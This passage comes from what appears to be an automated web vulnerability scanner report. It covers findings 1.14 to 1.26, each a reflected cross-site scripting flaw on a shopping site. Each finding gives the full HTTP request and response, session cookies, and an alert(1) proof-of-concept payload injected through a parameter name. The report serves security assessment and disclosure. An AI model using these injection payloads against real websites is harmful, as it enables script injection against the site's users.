GET /breakfast-cereal.fp?c83cf'-alert(1)-'f9ff5feeef2=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:59:07 GMT Connection: close Content-Length: 169667
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=133309&c83cf'-alert(1)-'f9ff5feeef2=1&action=browselocall2&viewmode=local&referrer=&random=1560641661&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.14. http://www.shoplocal.com/browselocall1.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/browselocall1.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cad4d'-alert(1)-'82e3775f808 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browselocall1.aspx?N=133251&cad4d'-alert(1)-'82e3775f808=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:56:46 GMT Connection: close Content-Length: 123327
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=133251&cad4d'-alert(1)-'82e3775f808=1&action=browselocall1&viewmode=local&referrer=&random=1417352678&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&statisticrequestid=514107493&serverid=100&slhlogon=' + readSubCookie('SLHUID','U ...[SNIP]...
1.15. http://www.shoplocal.com/browseonlineall.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/browseonlineall.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4235'-alert(1)-'4b383fe7ce0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browseonlineall.aspx?c4235'-alert(1)-'4b383fe7ce0=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=N; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:44:40 GMT Connection: close Content-Length: 132713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?c4235'-alert(1)-'4b383fe7ce0=1&action=browseonlineall&viewmode=ecommerce&referrer=&random=1299085559&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.16. http://www.shoplocal.com/buns-rolls.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/buns-rolls.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bef0'-alert(1)-'ff4b85dfcc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /buns-rolls.fp?5bef0'-alert(1)-'ff4b85dfcc8=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:47:36 GMT Connection: close Content-Length: 99346
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=135096&5bef0'-alert(1)-'ff4b85dfcc8=1&action=browselocall2&viewmode=local&referrer=&random=838174914&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.17. http://www.shoplocal.com/cakes-pies.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/cakes-pies.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5049d'-alert(1)-'8e9989a53ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cakes-pies.fp?5049d'-alert(1)-'8e9989a53ce=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:48:44 GMT Connection: close Content-Length: 114149
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=135097&5049d'-alert(1)-'8e9989a53ce=1&action=browselocall2&viewmode=local&referrer=&random=37474495&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.18. http://www.shoplocal.com/category.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/category.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40563'-alert(1)-'6ea114101fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category.fp?40563'-alert(1)-'6ea114101fc=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:44:59 GMT Connection: close Content-Length: 113965
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?40563'-alert(1)-'6ea114101fc=1&action=categorylist&viewmode=local&referrer=&random=466176407&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.19. http://www.shoplocal.com/cereal.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/cereal.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9620'-alert(1)-'71436949d3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cereal.fp?e9620'-alert(1)-'71436949d3f=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:58:42 GMT Connection: close Content-Length: 166299
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=134859&e9620'-alert(1)-'71436949d3f=1&action=browselocall2&viewmode=local&referrer=&random=1081305339&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.20. http://www.shoplocal.com/cleaning-supplies.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/cleaning-supplies.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61e1f'-alert(1)-'fb759b5ea66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cleaning-supplies.fp?61e1f'-alert(1)-'fb759b5ea66=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:56:59 GMT Connection: close Content-Length: 182623
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=133304&61e1f'-alert(1)-'fb759b5ea66=1&action=browselocall2&viewmode=local&referrer=&random=1849581045&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.21. http://www.shoplocal.com/clothing.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/clothing.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5e96'-alert(1)-'6c7d2accb52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /clothing.fp?f5e96'-alert(1)-'6c7d2accb52=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:46:20 GMT Connection: close Content-Length: 124496
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=133263&f5e96'-alert(1)-'6c7d2accb52=1&action=browselocall1&viewmode=local&referrer=&random=934117611&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&statisticrequestid=514102759&serverid=100&slhlogon=' + readSubCookie('SLHUID','UI ...[SNIP]...
1.22. http://www.shoplocal.com/coffee-tea.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/coffee-tea.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ada7'-alert(1)-'20b0c5797c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee-tea.fp?2ada7'-alert(1)-'20b0c5797c=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:58:02 GMT Connection: close Content-Length: 167585
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=135309&2ada7'-alert(1)-'20b0c5797c=1&action=browselocall2&viewmode=local&referrer=&random=1583970592&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.23. http://www.shoplocal.com/cooking-oil.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/cooking-oil.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86158'-alert(1)-'ffdebbbfd30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cooking-oil.fp?86158'-alert(1)-'ffdebbbfd30=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:06 GMT Connection: close Content-Length: 92826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=135320&86158'-alert(1)-'ffdebbbfd30=1&action=browselocall2&viewmode=local&referrer=&random=630011742&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.24. http://www.shoplocal.com/coupons.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/coupons.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16cca'-alert(1)-'2ecd2b59d4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coupons.aspx?16cca'-alert(1)-'2ecd2b59d4c=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0&couponclippings=; expires=Tue, 20-Nov-2035 18:43:45 GMT; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:43:50 GMT Connection: close Content-Length: 56041
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?16cca'-alert(1)-'2ecd2b59d4c=1&action=coupons&viewmode=local&referrer=&random=538894496&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.25. http://www.shoplocal.com/dessert-mixes-frosting.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/dessert-mixes-frosting.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b0d7'-alert(1)-'9a9409e9f13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dessert-mixes-frosting.fp?3b0d7'-alert(1)-'9a9409e9f13=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:19 GMT Connection: close Content-Length: 165343
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=135318&3b0d7'-alert(1)-'9a9409e9f13=1&action=browselocall2&viewmode=local&referrer=&random=976141943&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.26. http://www.shoplocal.com/electronics.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/electronics.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57c71'-alert(1)-'7dc51db5314 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /electronics.fp?57c71'-alert(1)-'7dc51db5314=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
